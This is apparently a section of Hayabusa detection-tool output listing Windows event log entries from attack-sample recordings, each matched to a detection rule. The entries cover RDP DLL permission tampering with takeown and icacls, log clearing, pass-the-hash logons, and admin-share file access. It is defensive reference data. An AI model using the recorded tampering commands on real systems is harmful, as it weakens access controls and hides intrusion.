+2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,../hayabusa-rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer:  | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
